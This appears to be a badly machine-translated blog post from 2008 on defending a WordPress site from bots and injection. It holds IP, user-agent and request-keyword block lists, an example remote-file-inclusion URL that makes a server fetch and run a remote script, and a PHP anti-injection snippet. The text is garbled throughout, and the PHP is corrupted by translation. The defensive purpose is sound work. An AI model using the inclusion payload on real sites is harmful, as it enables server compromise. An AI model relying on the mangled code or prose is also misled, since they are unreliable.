你可能知道,在许多情况下,网页或博客试图破解,搞砸了,自动污染许多无意义的匿名评论,使用一些脚本。 当然,往往适用于手动模式下,你有什么真的是一个相当可观的数目冷杉的情况下,防御的方法之一 - 不知道。检查的要求,发送到其他IP参数的妖孽,并阻止他们。 只是用我所提出的方法,不仅为自己辩护,但也发现多远,多久,你正在攻击。 更多...
续订
虽然目录中提供了“手动”方式使用WordPress是一种特殊的保护,为一个更安全和更清洁的网站允许- TimesToCome的安全插件 。 当您安装此插件将增加安全参数。 个人而言,我使用下面的IP封锁,用户代理和查询-部分原因,因为你抓住了在这里展示 (也可以使用您的记录)。 即使你甚至可以在Firefox,Internet Explorer中看到 - 它通常被称为机器人。
警告。 nepriisiimu这里提供封锁的IP,用户代理,查询,让每一位参观者,以决定是否是适当的任何记录的任何责任。
封锁的IP:
(这是您的IP被驱逐名单:) | 阻止用户代理
(这是您的代理驱逐名单) | 被阻止的请求
(这是你的请求黑名单) |
12.192.82.221
121.151.44.115
121.209.51.58
122133106125
123.224.54.112
124.59.113.24
125.141.64.124
128.163.2.43
131.220.64.240
137.48.217.20
142165135180
150.187.25.20
151.13.233.147
158.109.36.140
160.99.12.231
189104241248
190.183.61.18
190.196.2.205
190.196.5.189
193171110146
193.207.106.54
193.253.223.90
193.41.90.11
193.64.244.176
194.165.49.171
194219192251
194.244.39.57
195234106106
195.47.9.2
200.203.121.1
200.49.155.60
201.8.240.141
201.9.129.198
202.47.4.161
203.88.114.169
208.116.39.133
209.12.244.192
209.172.33.53
209195110123
209216249151
209.240.239.2
211.45.156.100
212.34.184.239
212.85.146.235
213.203.223.25
213.91.210.194
216.206.238.35
216.246.228.87
216.82.211.137
217198149178
217.64.177.199
218.186.13.3
218.234.19.139
219104211129
220.86.116.174
221.153.3.136
222.122.179.42
222.164.209.65
222.96.185.28
24.109.59.229
24.200.137.142 124.179.227.139
24.66.10.194
38.117.65.239
58.177.86.197
59.11.15.187 91.121.87.84
60.52.22.176
61.47.10.168
62.103.159.31
62128242180
62193211155
62.75.185.209
62.80.243.201
63.247.43.250
64.15.155.201
64185237191
64.21.98.196
64.246.187.54
65.254.54.218
65.254.63.210
65.95.110.16
65.95.153.184
65.98.67.106
66.135.41.76
66.98.244.93
67.15.48.60
67.18.29.218
67.202.60.246
67.219.69.45
67.68.20.251
67.70.127.164
67.71.176.187
68.147.159.38
69.128.204.74
69.14.152.152
69.157.22.63
69.159.63.161
69.94.120.198
70.85.201.66
70.86.30.82
70.87.240.50
71.101.46.11
71121104178
71.43.15.172
72.233.69.58
72.29.77.72
72.49.255.51
72.55.131.17
72.69.137.26
74.210.176.55
74.6.17.188
75125143162
76.66.125.33
76.68.22.147
76.71.160.65
77189155254
77203192230
78.111.68.37
78.130.75.90
78164157213
78.42.74.174
79133236143
79.136.97.34
79.66.133.114
79.76.213.251
80.146.78.213
80.218.173.93
80233176183
80.53.133.106
81.2.200.22
82.194.67.123
82.225.55.136
82.37.19.52
82.98.141.70
83.160.222.29
83.17.224.250
83240164232
83.65.47.4
83.81.61.72
84.165.87.140
84.72.120.152
85114140133
85157139109
85.171.82.87
85192189233
85.235.40.30
85.25.10.95
85.96.215.53
86.1.196.79
86109167160
86.109.96.134
86145194229
87.101.4.49
87106222144
87.234.201.76
87.61.174.29
88.119.99.10
88.214.192.29
88.223.50.146
88.244.162.64
88.252.145.65
88252149114
89.111.173.68
89.42.133.2
91121204165
91.186.11.35
91.84.19.133
91.89.198.178
92.233.76.213
92.4.112.196 64233183。* 61.103.33.48
92.61.36.98
96.247.65.124 | AnotherBot
botpaidtoclick
点击BOT
cr4nk
公关5.3
DataCha0s
discobot
的EBM-苹果
EmailSearch
EmailSiphon
快速ESP文件猎犬
火狐2.0
ginxbot
GrubNG
GVFS
HTTrack
incutio
154345访问:
Internet Explorer中
互联网忍者
Java的
JetBrains公司
libcurl的
与libwww-perl的
LWP请求
LWP平凡
Macintosh的;我; PPC
Microsoft数据访问
MJ12bot
睡眠他妈的扫描器
Mozilla Firefox浏览器5.0
Mozilla/4.0(兼容
mozilla/4.08
mozilla/4.61(在Macintosh
mozilla/5/0(兼容
mozilla/7.0
Mozilla的/ 8
Mozilla / Firefox中
Mp3Bot
MSIE6
NIPGCrawler
梨
PECL的
PHPot
发现协议供应商
PuxaRapido
pycurl
python的urllib模块的
虽然安全
网站狙击手
SkyGrid
搜狗
sun4m
日出
syncrisis
topicblogs
用户代理
W3CRobot
宽:PACBHO60
Web ::刮板的
WEBDAV
WebRipper
Wget的
window.location的
温妮婆
www.ranks.nl
X12R1
xerka-BOT | 的$ _GET
(JAVA | VB)
GIF?
JPG?
TXT?
XML?
</ SCRIPT>
<SCRIPT>
?Page_id =的http%3A%2F%2F
管理-ajax.php?
管理员function.php?
ASCII码
board.php FTP =?
科协
com_jd-WP
CONCAT
的DECLARE
删除
FormMail程式
了includedir =
的index.php?模板=
插入
LWP平凡
股权
密码
的PATH =
POST / xmlrpc.php
PROPFIND
注册+ +
选择
的sidebar.php?
联合
更新
字管,button.php?
WP-配置
WP-login.php?行动=的http%3A%2F%2F
的WP表-button.php?
WP-trackback.php?
X-AAAAAAAAA |
什么是查询,以及为什么他们需要阻止吗? 比方说,您的网站是一个漏洞,或刚刚就任进攻papuolėte视野,(但往往只是进攻连续进攻查询)。
假设一个文件的sidebar.php不安全了查询变量变的sidebar.php?变= http://www.kompiuteriszombis.com/botas.txt,您的服务器将被执行botas.txt脚本,并在大多数情况下,你可以说,你的服务器已经砍死。
网站的安全。
如果你有一个网站,你可以使用这个脚本,你需要保存到你的index.php,在您的电子邮件改变nemapirškite email@email.com 。 电子邮件
/ ********* ANTIHACK开始**************** ************** /
/ /检查注射
所需物品= $ _SERVER ['REQUEST_URI'];
卡德纳=爆炸($所需物品“?”);
$ = $ Mi_url卡德纳[0];
$ = $卡德纳餐厅[1];
/ /在这里你可以把你的意志你的猜疑链。 只要小心
/ /巧合不问你的变量和参数的URL
美元Inyecc =“/脚本| HTTP | <|> |%3C |%3E |选择|联盟|更新| EXE | EXEC |插入| TMP /我;
/ /检测
(preg_match($ inyecc,恢复)&& $ _REQUEST数组['FullURL']){
/ /做的东西,例如发送到管理员的电子邮件提醒
/ / $ IP =:$ HTTP_SERVER_VARS [“HTTP_CLIENT_IP”];
$ IP = $ _SERVER ['REMOTE_ADDR'];
转发$ =:$ HTTP_SERVER_VARS ['HTTP_X_FORWARDED_FOR'];
$ = $ Remoteaddress HTTP_SERVER_VARS [“REMOTE_ADDR”];
=“mi_url $ \ N \ nchain注入攻击:$ $消息resto \ N \ N
从:(IP-forwa的,RA): - $ IP - $转发 - remoteaddress $ \ N \ N
---结束-------“;
电子邮件( email@email.com ,“注入攻击”,美元的消息,
“从:”信息@ {$ _SERVER ['SERVER_NAME']}“,”fwebmaster @ {$ _SERVER ['SERVER_NAME']}“);
####Uzbaninam过的。htaccess
FH = FOPEN('。htaccess的','A')或死亡(“无法打开文件。”);
美元Towrite =“\ N#$ remoteaddress - 休息”;
的美元Towrite =“\ $ Ndeny中IP \ N”。;
FWRITE($ FH $ towrite),;
FCLOSE(FH);
####
/ /杀死的消息,并执行
回声“非法URL”;
死亡();
}
/ ********** ANTIHACK完**************** ************** /
2008年12月20 10:12
对于这样一个前dalikams Apache的mod_security的很长一段时间被创建 - 我不需要推倒重来。
为preg'o - “FTP”协议“删除SQL查询中没有提及。 还审查不仅查询,但变数名称 - 使用此代码之前,每个人都必须考虑重要的是使用
贝雅,可以做SQL注入到左“呢?”Eančia地址。
如果系统代码是歪的 - 只是GET请求,将没有足够的保护,需要过滤的职位和Cookies。
这将是更加舒适,不只是在一些地方,到处看到立陶宛代码注释。
嗯,htaccess文件证书 - 没有安全占领。 当然,一切都取决于主机系统。